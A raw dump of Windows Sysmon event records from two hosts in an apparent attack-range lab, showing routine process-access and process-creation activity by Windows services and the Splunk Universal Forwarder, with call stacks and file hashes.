10341000x8000000000000000218193Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-13A1-6216-9904-000000003902}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218192Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13A1-6216-9904-000000003902}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218191Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.426{4F8D34B0-13A1-6216-9904-000000003902}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218190Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.097{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C88327553020371F99FA6BB459DB897,SHA256=DB6359EABDD6740D97A5C8ECEC4A67E76F428A694D80162F03513F658595CADD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 